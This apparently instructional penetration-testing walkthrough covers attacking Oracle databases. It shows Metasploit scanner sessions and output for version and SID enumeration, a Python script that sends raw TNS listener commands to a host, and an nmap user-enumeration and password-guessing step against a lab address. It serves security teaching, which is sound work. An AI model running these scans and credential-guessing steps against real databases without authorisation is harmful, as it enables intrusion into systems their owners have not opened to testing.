Oracle Attack Methodology

1. Locate Oracle Systems

2. Determine Oracle Version

3. Determine Oracle SID

4. Guess/Bruteforce USER/PASS

5. Privilege Escalation via SQL Injection

6. Manipulate Data/Post Exploitation

7. Cover Tracks

++++++++++++++++++++++++++++++++++Determine Oracle Version

msf > use auxiliary/scanner/oracle/

use auxiliary/scanner/oracle/emc_sid

use auxiliary/scanner/oracle/isqlplus_login

use auxiliary/scanner/oracle/isqlplus_sidbrute

use auxiliary/scanner/oracle/oracle_hashdump

use auxiliary/scanner/oracle/oracle_login

use auxiliary/scanner/oracle/sid_brute

use auxiliary/scanner/oracle/sid_enum

use auxiliary/scanner/oracle/spy_sid

use auxiliary/scanner/oracle/tnslsnr_version

use auxiliary/scanner/oracle/xdb_sid

use auxiliary/scanner/oracle/xdb_sid_brute

msf > use auxiliary/scanner/oracle/tnslsnr_version

msf auxiliary(tnslsnr_version) > show options

Module options (auxiliary/scanner/oracle/tnslsnr_version):

   Name     Current Setting  Required  Description

   ----     ---------------  --------  -----------

   RHOSTS                    yes       The target address range or CIDR identifier

   RPORT    1521             yes       The target port

   THREADS  1                yes       The number of concurrent threads

msf auxiliary(tnslsnr_version) > set RHOSTS 192.168.1.100

RHOSTS => 192.168.1.100

msf auxiliary(tnslsnr_version) > run

[+] 192.168.1.100:1521 Oracle - Version: 32-bit Windows: Version 9.2.0.1.0 - Production

[*] Scanned 1 of 1 hosts (100% complete)

[*] Auxiliary module execution completed

++++++++++++++++++++++++++++++++++Determine Oracle SID

msf auxiliary(tnslsnr_version) > use auxiliary/scanner/oracle/sid_enum

msf auxiliary(sid_enum) > set RHOSTS 192.168.1.100

RHOSTS => 192.168.1.100

msf auxiliary(sid_enum) > set THREADS 8

THREADS => 8

msf auxiliary(sid_enum) > show options

Module options (auxiliary/scanner/oracle/sid_enum):

   Name     Current Setting  Required  Description

   ----     ---------------  --------  -----------

   RHOSTS   192.168.1.100    yes       The target address range or CIDR identifier

   RPORT    1521             yes       The target port

   THREADS  8                yes       The number of concurrent threads

msf auxiliary(sid_enum) > run

[+] Identified SID for 192.168.1.100:1521 ["PLSExtProc"]

[+] Identified SID for 192.168.1.100:1521 ["dbnis"]

[*] Identified SERVICE_NAME for 192.168.1.100:1521 ["PLSExtProc"]

[*] Identified SERVICE_NAME for 192.168.1.100:1521 ["dbnis"]

[*] Identified SERVICE_NAME for 192.168.1.100:1521 ["dbnisXDB"]

[*] Scanned 1 of 1 hosts (100% complete)

[*] Auxiliary module execution completed
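What the two modules above do on the wire, as an added example (not code from the page, from Metasploit or from nmap): tnslsnr_version and sid_enum both send a TNS Connect packet whose connect string is a listener command, VERSION or STATUS, and then read VSNNUM, ERR, INSTANCE_NAME and SERVICE_NAME out of the plain-text reply. The packet field values follow the layout tnscmd.pl and the Wireshark TNS dissector use; the two sample replies are constructed, modelled on the page's 9.2.0.1.0 host and on the TNS-01189 refusal a 10g or later listener gives remote listener commands, not captured traffic; the script name tns_probe.py in the usage comment is hypothetical. The refusal is the practitioner's caveat: from 10g on the listener will not hand out STATUS (and so the SID list) to a remote, unauthenticated client, which is when sid_brute becomes the fallback.

```python
import re
import socket
import struct

TNS_CONNECT, TNS_REFUSE, TNS_DATA, TNS_RESEND = 1, 4, 6, 11
CONNECT_DATA_OFFSET = 58  # 8-byte header + 50-byte connect body, as tnscmd.pl lays it out


def wrap_tns(ptype: int, payload: bytes) -> bytes:
    """Prefix payload with the 8-byte TNS header: length, checksum, type, reserved, hdr checksum."""
    return struct.pack(">HHBBH", 8 + len(payload), 0, ptype, 0, 0) + payload


def build_tns_connect(connect_data: str) -> bytes:
    """TNS Connect packet (type 1) carrying connect_data, e.g. '(CONNECT_DATA=(COMMAND=VERSION))'."""
    body = struct.pack(
        ">HHHHHHHHHHIBBII",
        0x0136, 0x012C,           # TNS version 310, lowest compatible version 300
        0x0000, 0x0800, 0x7FFF,   # service options, SDU size, max TDU size
        0x7F08, 0x0000, 0x0001,   # NT protocol characteristics, line turnaround, "1 in hardware"
        len(connect_data),        # connect data length
        CONNECT_DATA_OFFSET,      # connect data offset from packet start
        0, 0, 0, 0, 0)            # max receivable connect data, flags 0/1, trace items 1/2
    body += b"\x00" * 16          # 8-byte trace unique connection id + 8 bytes padding
    assert len(body) == CONNECT_DATA_OFFSET - 8
    return wrap_tns(TNS_CONNECT, body + connect_data.encode("ascii"))


def split_tns_packets(stream: bytes):
    """Yield (type, payload) for each TNS packet in a reply stream, framing on the length field."""
    while len(stream) >= 8:
        plen, _chk, ptype = struct.unpack(">HHB", stream[:5])
        if plen < 8 or plen > len(stream):
            break                 # truncated or not TNS: stop rather than mis-frame
        yield ptype, stream[8:plen]
        stream = stream[plen:]


def extract_text(packets) -> str:
    """Concatenate the textual part of Data (2 flag bytes) and Refuse (reasons + length) payloads."""
    parts = []
    for ptype, payload in packets:
        skip = 2 if ptype == TNS_DATA else 4 if ptype == TNS_REFUSE else 0
        parts.append(payload[skip:].decode("latin-1"))
    return "".join(parts)


def decode_vsnnum(vsnnum: int) -> str:
    """VSNNUM packs the version in hex: 153092352 == 0x09200100 -> 9.2.0.1.0."""
    return "%d.%d.%d.%d.%d" % ((vsnnum >> 24) & 0xFF, (vsnnum >> 20) & 0xF,
                               (vsnnum >> 16) & 0xF, (vsnnum >> 8) & 0xFF, vsnnum & 0xFF)


def parse_listener_reply(text: str) -> dict:
    """Version, listener error code and the SID / service names a STATUS reply exposes."""
    vsn = re.search(r"\(VSNNUM=(\d+)\)", text)
    err = re.search(r"\(ERR=(\d+)\)", text)
    return {
        "version": decode_vsnnum(int(vsn.group(1))) if vsn else None,
        "err": int(err.group(1)) if err else None,
        "instances": sorted(set(re.findall(r"\(INSTANCE_NAME=([^)]+)\)", text))),
        "services": sorted(set(re.findall(r"\(SERVICE_NAME=([^)]+)\)", text))),
    }


def parse_reply_bytes(stream: bytes) -> dict:
    return parse_listener_reply(extract_text(split_tns_packets(stream)))


def listener_command(host: str, port: int = 1521, command: str = "VERSION", timeout: float = 5.0) -> dict:
    """Send one listener command over the network and parse whatever comes back."""
    request = build_tns_connect("(CONNECT_DATA=(COMMAND=%s))" % command)
    buf = b""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(request)
        try:
            while chunk := sock.recv(4096):
                buf += chunk
                if len(buf) >= 5 and buf[4] == TNS_RESEND:  # old listeners ask for a resend first
                    buf = b""
                    sock.sendall(request)
        except socket.timeout:
            pass                  # listener left the socket open; parse what we have
    return parse_reply_bytes(buf)


# Constructed sample replies (not captured traffic): a 9.2.0.1.0 listener answering STATUS
# across two Data packets, and a 10g+ listener refusing the command with TNS-01189.
SAMPLE_STATUS_REPLY = wrap_tns(TNS_DATA, b"\x00\x00"
    b"(DESCRIPTION=(TMP=)(VSNNUM=153092352)(ERR=0)(ALIAS=LISTENER)(SECURITY=OFF)"
    b"(VERSION=TNSLSNR for 32-bit Windows: Version 9.2.0.1.0 - Production))") + wrap_tns(TNS_DATA, b"\x00\x00"
    b"(SERVICE=(SERVICE_NAME=PLSExtProc)(INSTANCE=(INSTANCE_NAME=PLSExtProc)(NUM=0)(INSTANCE_STATUS=UNKNOWN)))"
    b"(SERVICE=(SERVICE_NAME=dbnis)(INSTANCE=(INSTANCE_NAME=dbnis)(NUM=1)(INSTANCE_STATUS=READY)))"
    b"(SERVICE=(SERVICE_NAME=dbnisXDB)(INSTANCE=(INSTANCE_NAME=dbnis)(NUM=1)(INSTANCE_STATUS=READY))))")
_REFUSE = b"(DESCRIPTION=(ERR=1189)(ERROR_STACK=(ERROR=(CODE=1189)(EMFI=4))))"
SAMPLE_REFUSE_REPLY = wrap_tns(TNS_REFUSE, b"\x22\x00" + struct.pack(">H", len(_REFUSE)) + _REFUSE)

if __name__ == "__main__":
    import sys
    print(parse_reply_bytes(SAMPLE_STATUS_REPLY))   # offline: the constructed 9i STATUS reply
    print(parse_reply_bytes(SAMPLE_REFUSE_REPLY))   # offline: the constructed TNS-01189 refusal
    if len(sys.argv) > 1:                            # live: python tns_probe.py HOST [VERSION|STATUS]
        print(listener_command(sys.argv[1], command=sys.argv[2] if len(sys.argv) > 2 else "VERSION"))
```

Against the page's host the STATUS reply parses to version 9.2.0.1.0 with services PLSExtProc, dbnis and dbnisXDB and instances PLSExtProc and dbnis, the same three names sid_enum printed; against a hardened listener only err=1189 comes back, and the SID has to be guessed instead.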

................

Once the SID is known, the next step is to guess the Oracle username/password; with a working account you can log in and try to escalate privileges. For a detailed description of the steps above, see the PDF under the references below.

When Metasploit guesses passwords (auxiliary/scanner/oracle/oracle_login) it calls nmap's oracle-brute script, so the Oracle-related scripts shipped with nmap are worth knowing; they are listed below. Note that online guessing counts against the account's FAILED_LOGIN_ATTEMPTS limit (10 in the DEFAULT profile from 10gR2 onwards), so spraying a long wordlist locks accounts rather than opening them; oracle-brute-stealth exists for exactly that reason, taking the authentication challenge offline instead of attempting logins.

# ls -l /usr/share/nmap/scripts/*oracle*

-rw-r--r-- 1 root root 7159 Dec  6  2013 /usr/share/nmap/scripts/oracle-brute.nse

-rw-r--r-- 1 root root 6465 Dec  6  2013 /usr/share/nmap/scripts/oracle-brute-stealth.nse

-rw-r--r-- 1 root root 4615 Dec  6  2013 /usr/share/nmap/scripts/oracle-enum-users.nse

-rw-r--r-- 1 root root 4892 Dec  6  2013 /usr/share/nmap/scripts/oracle-sid-brute.nse

nmap --script oracle-enum-users --script-args oracle-enum-users.sid=dbnis,userdb=oracle_default_users.txt -p 1521 192.168.1.100 

References:

http://pentestlab.wordpress.com/category/information-gathering/

http://www.blackhat.com/presentations/bh-usa-09/GATES/BHUSA09-Gates-OracleMetasploit-SLIDES.pdf